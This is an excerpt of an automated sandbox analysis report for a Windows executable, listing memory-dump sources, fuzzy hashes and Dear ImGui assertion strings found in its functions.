                                                                                  • Source File: 00000002.00000002.3389721161.00007FF6AE6D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6AE6D0000, based on PE: true
                                                                                  • Associated: 00000002.00000002.3389397401.00007FF6AE6D0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3389950650.00007FF6AE833000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3389987215.00007FF6AE834000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3390089990.00007FF6AE88B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3390144437.00007FF6AE88C000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3390566889.00007FF6AEAA2000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3390615293.00007FF6AEAA6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_7ff6ae6d0000_FullOption_2.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: ByteCharMultiWide_wassert$_wfopenfreemalloc
                                                                                  • String ID: D:\ALLLLREALSHY\src\$i >= 0 && i < Size
                                                                                  • API String ID: 3904767993-608382026
                                                                                  • Opcode ID: e30abae2b6392072aee14a36cd6ac39494cd2ffe5263cf9b4283fde26147932b
                                                                                  • Instruction ID: de2100154448dff941e886c40010501901bfedea5872aa73b185e887fe81281b
                                                                                  • Opcode Fuzzy Hash: e30abae2b6392072aee14a36cd6ac39494cd2ffe5263cf9b4283fde26147932b
                                                                                  • Instruction Fuzzy Hash: FB418135A0AF4381EB30AF1BE85013566A1FBA4B90F546639E96E877A4DF3CE5018700
                                                                                  APIs
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.3389721161.00007FF6AE6D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6AE6D0000, based on PE: true
                                                                                  • Associated: 00000002.00000002.3389397401.00007FF6AE6D0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3389950650.00007FF6AE833000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3389987215.00007FF6AE834000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3390089990.00007FF6AE88B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3390144437.00007FF6AE88C000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3390566889.00007FF6AEAA2000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3390615293.00007FF6AEAA6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_7ff6ae6d0000_FullOption_2.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: _wassert$free
                                                                                  • String ID: D:\ALLLLREALSHY\src\$D:\ALLLLREALSHY\src\$D:\ALLLLREALSHY\src\$i >= 0 && i < Size$p >= Buf.Data && p < Buf.Data + Buf.Size$p >= Data && p < DataEnd$table->MemoryCompacted == false
                                                                                  • API String ID: 523432916-1333835353
                                                                                  • Opcode ID: 41166ba6b5f59243e46f326cb29b21f298229eb06b47db352a4395b2d0f9712a
                                                                                  • Instruction ID: fb1928e010b7269c16be681bb930fa2a5b28ed1e410f5b37229680f9d99fceae
                                                                                  • Opcode Fuzzy Hash: 41166ba6b5f59243e46f326cb29b21f298229eb06b47db352a4395b2d0f9712a
                                                                                  • Instruction Fuzzy Hash: 5D419232B1AB8285EB20AF16E8642B87764FB64B84F480436EE4D8B764DF7DE541C310
                                                                                  APIs
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.3389721161.00007FF6AE6D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6AE6D0000, based on PE: true
                                                                                  • Associated: 00000002.00000002.3389397401.00007FF6AE6D0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3389950650.00007FF6AE833000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3389987215.00007FF6AE834000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3390089990.00007FF6AE88B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3390144437.00007FF6AE88C000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3390566889.00007FF6AEAA2000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3390615293.00007FF6AEAA6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_7ff6ae6d0000_FullOption_2.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: fclose$fseekftell$_wassertfreadfreemalloc
                                                                                  • String ID: D:\ALLLLREALSHY\src\$filename && mode
                                                                                  • API String ID: 3784304092-161044092
                                                                                  • Opcode ID: e87be9d7f091dd822ad340e1ddd8b376a0ff81b42bec1944dd6a5e55449992cb
                                                                                  • Instruction ID: e548daad4aee3942543cf6cd3e230439098debe80be6b69c03dcfe69e4251e1d
                                                                                  • Opcode Fuzzy Hash: e87be9d7f091dd822ad340e1ddd8b376a0ff81b42bec1944dd6a5e55449992cb
                                                                                  • Instruction Fuzzy Hash: D4314024B0BE4386EA65AB17A88437562E0AF65BA1F587530FD2EC77D4EE2CE8455300
                                                                                  APIs
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.3389721161.00007FF6AE6D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6AE6D0000, based on PE: true
                                                                                  • Associated: 00000002.00000002.3389397401.00007FF6AE6D0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3389950650.00007FF6AE833000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3389987215.00007FF6AE834000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3390089990.00007FF6AE88B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3390144437.00007FF6AE88C000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3390566889.00007FF6AEAA2000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3390615293.00007FF6AEAA6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_7ff6ae6d0000_FullOption_2.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: _wassert
                                                                                  • String ID: ###NavWindowingList$##MainMenuBar$*Missing Text*$D:\ALLLLREALSHY\src\$D:\ALLLLREALSHY\src\$g.NavWindowingTarget != 0$i >= 0 && i < Size$window != 0
                                                                                  • API String ID: 3234217646-2416091106
                                                                                  • Opcode ID: 628aaa0174f7345bfbaf286ee459bccdc0867d98315563300f0783822f5dd399
                                                                                  • Instruction ID: db40c5d713f354a0ed15240c80bc9651ae4234600a23cbf31ec8ad798c220361
                                                                                  • Opcode Fuzzy Hash: 628aaa0174f7345bfbaf286ee459bccdc0867d98315563300f0783822f5dd399
                                                                                  • Instruction Fuzzy Hash: 36911372A1AB8685E711EF27D8402B87360FF66784F58AA32EA1D972D4DF3DE445C700
                                                                                  APIs
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.3389721161.00007FF6AE6D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6AE6D0000, based on PE: true
                                                                                  • Associated: 00000002.00000002.3389397401.00007FF6AE6D0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3389950650.00007FF6AE833000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3389987215.00007FF6AE834000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3390089990.00007FF6AE88B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3390144437.00007FF6AE88C000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3390566889.00007FF6AEAA2000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3390615293.00007FF6AEAA6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_7ff6ae6d0000_FullOption_2.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: _wassert$memmove
                                                                                  • String ID: !g.WindowsFocusOrder.contains(window)$D:\ALLLLREALSHY\src\$D:\ALLLLREALSHY\src\$g.WindowsFocusOrder[window->FocusOrder] == window$i >= 0 && i < Size$it >= Data && it < Data + Size
                                                                                  • API String ID: 1822516562-632053533
                                                                                  • Opcode ID: 79d2196a5fa5a8b7acb25b9b0f2e98be2a71d2e79f30061724d324eb3061624f
                                                                                  • Instruction ID: aee5e31dc216f0ea192f19835ad00c5f2e7f8878fc3d91aaf71bcd6350fde5e8
                                                                                  • Opcode Fuzzy Hash: 79d2196a5fa5a8b7acb25b9b0f2e98be2a71d2e79f30061724d324eb3061624f
                                                                                  • Instruction Fuzzy Hash: B8711626717AC281EB21EF16D8802F97361FB64B84F942632EA0D87794CF7DE556C701
                                                                                  APIs
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.3389721161.00007FF6AE6D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6AE6D0000, based on PE: true
                                                                                  • Associated: 00000002.00000002.3389397401.00007FF6AE6D0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3389950650.00007FF6AE833000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3389987215.00007FF6AE834000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3390089990.00007FF6AE88B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3390144437.00007FF6AE88C000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3390566889.00007FF6AEAA2000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3390615293.00007FF6AEAA6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_7ff6ae6d0000_FullOption_2.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: _wassert
                                                                                  • String ID: ##Foreground$D:\ALLLLREALSHY\src\$D:\ALLLLREALSHY\src\$Size > 0$i >= 0 && i < Size$mouse_cursor > ImGuiMouseCursor_None && mouse_cursor < ImGuiMouseCursor_COUNT
                                                                                  • API String ID: 3234217646-4267432902
                                                                                  • Opcode ID: fd7afb6f721b9e50d2ff70520d8f7a7bc069e882a9185f0efef075ea378d1c2f
                                                                                  • Instruction ID: ec1ff1de4c4b6f10126ac18f574e7f433d4e9195ab13af5d926190578e72bb21
                                                                                  • Opcode Fuzzy Hash: fd7afb6f721b9e50d2ff70520d8f7a7bc069e882a9185f0efef075ea378d1c2f
                                                                                  • Instruction Fuzzy Hash: C8E1E532A09BC985E7119B36D4412E9B3A0FFA9788F146732FE4863665DF7CE181DB00
                                                                                  APIs
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.3389721161.00007FF6AE6D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6AE6D0000, based on PE: true
                                                                                  • Associated: 00000002.00000002.3389397401.00007FF6AE6D0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3389950650.00007FF6AE833000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3389987215.00007FF6AE834000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3390089990.00007FF6AE88B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3390144437.00007FF6AE88C000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3390566889.00007FF6AEAA2000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3390615293.00007FF6AEAA6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_7ff6ae6d0000_FullOption_2.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: free$_wassert
                                                                                  • String ID: D:\ALLLLREALSHY\src\$DrawList == &DrawListInst
                                                                                  • API String ID: 94870348-2275439626
                                                                                  • Opcode ID: 3796d48da0e818b4b71ff92b868bdf970bf1d8078181f340ec8db1bc6436c160
                                                                                  • Instruction ID: 89a5a63ad94fbf62458f1d070e3045e348b4a25f1e07940d0cc9824765e5ef94
                                                                                  • Opcode Fuzzy Hash: 3796d48da0e818b4b71ff92b868bdf970bf1d8078181f340ec8db1bc6436c160
                                                                                  • Instruction Fuzzy Hash: 1E515135A0BA4285EE94AF16D49937927A0FF64F51F5C6835EE0D87664DF3CE440A310
                                                                                  APIs
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.3389721161.00007FF6AE6D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6AE6D0000, based on PE: true
                                                                                  • Associated: 00000002.00000002.3389397401.00007FF6AE6D0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3389950650.00007FF6AE833000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3389987215.00007FF6AE834000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3390089990.00007FF6AE88B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3390144437.00007FF6AE88C000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3390566889.00007FF6AEAA2000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3390615293.00007FF6AEAA6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_7ff6ae6d0000_FullOption_2.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: _wassert$freemallocmemcpy
                                                                                  • String ID: D:\ALLLLREALSHY\src\$p < end()$p >= begin() && p < end()
                                                                                  • API String ID: 2920042107-312861621
                                                                                  • Opcode ID: 6d7c9735bc8960e369c80b05c2e3e6a5264af2ed00ad266572b6bfae186096a5
                                                                                  • Instruction ID: 96a19a5a9d36d2f4013ca2600719b0701040eb4f0fe170b7dce170e79d023904
                                                                                  • Opcode Fuzzy Hash: 6d7c9735bc8960e369c80b05c2e3e6a5264af2ed00ad266572b6bfae186096a5
                                                                                  • Instruction Fuzzy Hash: FF715772B0AF4296EE18EF16EA5427AB3A1FF15750F444835EA1E87250EF3CE591C704
                                                                                  APIs
                                                                                  • _wassert.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF6AE6D748E
                                                                                  • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF6AE6D767E
                                                                                  • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF6AE6D7766
                                                                                  • memcpy.VCRUNTIME140(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF6AE6D7789
                                                                                  • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF6AE6D77AC
                                                                                    • Part of subcall function 00007FF6AE6F0BD0: malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,00000000,00007FF6AE6EE49A,?,?,0000000100000000,00007FF6AE6EE548,?,?,?,?,00007FF6AE6D5FFD), ref: 00007FF6AE6F0BFF
                                                                                    • Part of subcall function 00007FF6AE6F0BD0: memcpy.VCRUNTIME140(?,?,00000000,00007FF6AE6EE49A,?,?,0000000100000000,00007FF6AE6EE548,?,?,?,?,00007FF6AE6D5FFD), ref: 00007FF6AE6F0C17
                                                                                    • Part of subcall function 00007FF6AE6F0BD0: free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,00000000,00007FF6AE6EE49A,?,?,0000000100000000,00007FF6AE6EE548,?,?,?,?,00007FF6AE6D5FFD), ref: 00007FF6AE6F0C37
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.3389721161.00007FF6AE6D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6AE6D0000, based on PE: true
                                                                                  • Associated: 00000002.00000002.3389397401.00007FF6AE6D0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3389950650.00007FF6AE833000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3389987215.00007FF6AE834000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3390089990.00007FF6AE88B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3390144437.00007FF6AE88C000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3390566889.00007FF6AEAA2000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3390615293.00007FF6AEAA6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_7ff6ae6d0000_FullOption_2.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: malloc$freememcpy$_wassert
                                                                                  • String ID: !g.Initialized && !g.SettingsLoaded$D:\ALLLLREALSHY\src\$Table$Window
                                                                                  • API String ID: 3020423644-3519011356
                                                                                  • Opcode ID: 4e29bb722c8aaccb324105910aabb9190c4ebfa379b242cc166143bdda699d35
                                                                                  • Instruction ID: 0be29c0ab846ee44ea9051efac3b32a71939da1a92ab19b9713bb5f62d900510
                                                                                  • Opcode Fuzzy Hash: 4e29bb722c8aaccb324105910aabb9190c4ebfa379b242cc166143bdda699d35
                                                                                  • Instruction Fuzzy Hash: E4C18F36A07F8299EB11DF26E8802F837E5FB64714F546936EA4D83794EF38A065D340
                                                                                  APIs
                                                                                  • _wassert.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,00000000,00007FF6AE6E331D,?,?,00000000,00007FF6AE6D94A9), ref: 00007FF6AE6E8BBE
                                                                                  • _wassert.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,00000000,00007FF6AE6E331D,?,?,00000000,00007FF6AE6D94A9), ref: 00007FF6AE6E8BF6
                                                                                  • _wassert.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,00000000,00007FF6AE6E331D,?,?,00000000,00007FF6AE6D94A9), ref: 00007FF6AE6E8C3F
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.3389721161.00007FF6AE6D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6AE6D0000, based on PE: true
                                                                                  • Associated: 00000002.00000002.3389397401.00007FF6AE6D0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3389950650.00007FF6AE833000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3389987215.00007FF6AE834000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3390089990.00007FF6AE88B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3390144437.00007FF6AE88C000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3390566889.00007FF6AEAA2000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3390615293.00007FF6AEAA6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_7ff6ae6d0000_FullOption_2.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: _wassert
                                                                                  • String ID: (popup.Window->Flags & ImGuiWindowFlags_Popup) != 0$<NULL>$D:\ALLLLREALSHY\src\$D:\ALLLLREALSHY\src\$[popup] ClosePopupsOverWindow("%s")$i >= 0 && i < Size
                                                                                  • API String ID: 3234217646-3535552549
                                                                                  • Opcode ID: 8d64a09629624c5e78555fb17616db2eff5ea30bc2180f8a42c8df4cef359369
                                                                                  • Instruction ID: f748db67e5d998b251aae23d6994e0a2e419f91386a547a1522c9650280467a7
                                                                                  • Opcode Fuzzy Hash: 8d64a09629624c5e78555fb17616db2eff5ea30bc2180f8a42c8df4cef359369
                                                                                  • Instruction Fuzzy Hash: B2419B21A0BA9285EA20AF17E84067967A0FF62B84F4C3835FE4D97AD4DF7CE5419700
                                                                                  APIs
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.3389721161.00007FF6AE6D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6AE6D0000, based on PE: true
                                                                                  • Associated: 00000002.00000002.3389397401.00007FF6AE6D0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3389950650.00007FF6AE833000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3389987215.00007FF6AE834000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3390089990.00007FF6AE88B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3390144437.00007FF6AE88C000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3390566889.00007FF6AEAA2000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3390615293.00007FF6AEAA6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_7ff6ae6d0000_FullOption_2.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: free$_wassert
                                                                                  • String ID: !Locked && "Cannot modify a locked ImFontAtlas between NewFrame() and EndFrame/Render()!"$D:\ALLLLREALSHY\src\
                                                                                  • API String ID: 94870348-2185833214
                                                                                  • Opcode ID: df9abec2d26724ba9eeefd80838a8cac1cffe49704455131dfb4984d88f5f968
                                                                                  • Instruction ID: fe9d4939a6b713c56c08bc46181053ce11cf25361a49948c690f3d695f976826
                                                                                  • Opcode Fuzzy Hash: df9abec2d26724ba9eeefd80838a8cac1cffe49704455131dfb4984d88f5f968
                                                                                  • Instruction Fuzzy Hash: 8C412521A2A64285EA14AF26E4403B937A0FFA5B44F086475EE4E87BA4CF3EE441D340
                                                                                  APIs
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.3389721161.00007FF6AE6D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6AE6D0000, based on PE: true
                                                                                  • Associated: 00000002.00000002.3389397401.00007FF6AE6D0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3389950650.00007FF6AE833000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3389987215.00007FF6AE834000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3390089990.00007FF6AE88B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3390144437.00007FF6AE88C000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3390566889.00007FF6AEAA2000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3390615293.00007FF6AEAA6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_7ff6ae6d0000_FullOption_2.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: _wassert$memmove
                                                                                  • String ID: D:\ALLLLREALSHY\src\$Size > 0$i >= 0 && i < Size
                                                                                  • API String ID: 1822516562-793770333
                                                                                  • Opcode ID: 593a65748012f420ce058d144c08f835647305717d8b08851b33f7ad16b3080a
                                                                                  • Instruction ID: b5aa2a9a37d2eaf5d1eacb8d978f72ad3fab734aa33b13b33007819fe02fa146
                                                                                  • Opcode Fuzzy Hash: 593a65748012f420ce058d144c08f835647305717d8b08851b33f7ad16b3080a
                                                                                  • Instruction Fuzzy Hash: AF419326B1AE83D5EB20AF27E8841A97721FB61B81F482535E65EC36E0CF6CF545C710
                                                                                  APIs
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.3389721161.00007FF6AE6D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6AE6D0000, based on PE: true
                                                                                  • Associated: 00000002.00000002.3389397401.00007FF6AE6D0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3389950650.00007FF6AE833000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3389987215.00007FF6AE834000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3390089990.00007FF6AE88B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3390144437.00007FF6AE88C000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3390566889.00007FF6AEAA2000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3390615293.00007FF6AEAA6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_7ff6ae6d0000_FullOption_2.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: _wassert
                                                                                  • String ID: (int)draw_list->_VtxCurrentIdx == draw_list->VtxBuffer.Size$D:\ALLLLREALSHY\src\$draw_list->IdxBuffer.Size == 0 || draw_list->_IdxWritePtr == draw_list->IdxBuffer.Data + draw_list->IdxBuffer.Size$draw_list->VtxBuffer.Size == 0 || draw_list->_VtxWritePtr == draw_list->VtxBuffer.Data + draw_list->VtxBuffer.Size$draw_list->_VtxCurrentIdx < (1 << 16) && "Too many vertices in ImDrawList using 16-bit indices. Read comment above"
                                                                                  • API String ID: 3234217646-4043514374
                                                                                  • Opcode ID: 8e5d20037b9f9335284438eb356cd28856c90632ba2c93f6ad023eebb815942a
                                                                                  • Instruction ID: 5ee231a10250e94f905e3d05baf1a2320b04a2bde9c32e0310447a91a43e3eba
                                                                                  • Opcode Fuzzy Hash: 8e5d20037b9f9335284438eb356cd28856c90632ba2c93f6ad023eebb815942a
                                                                                  • Instruction Fuzzy Hash: 1131A075B1AA4381EB61EF16D88067823A1FB64B84F907435E60EC3298DF6CE894C700
                                                                                  APIs
                                                                                  • _wassert.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,Remaining,00007FF6AE6E60E2,?,?,00000000,00007FF6AE6E66FF), ref: 00007FF6AE6E3F3F
                                                                                  • _wassert.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,Remaining,00007FF6AE6E60E2,?,?,00000000,00007FF6AE6E66FF), ref: 00007FF6AE6E3F8C
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.3389721161.00007FF6AE6D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6AE6D0000, based on PE: true
                                                                                  • Associated: 00000002.00000002.3389397401.00007FF6AE6D0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3389950650.00007FF6AE833000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3389987215.00007FF6AE834000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3390089990.00007FF6AE88B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3390144437.00007FF6AE88C000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3390566889.00007FF6AEAA2000.00000004.00000001.01000000.00000006.sdmpDownload File
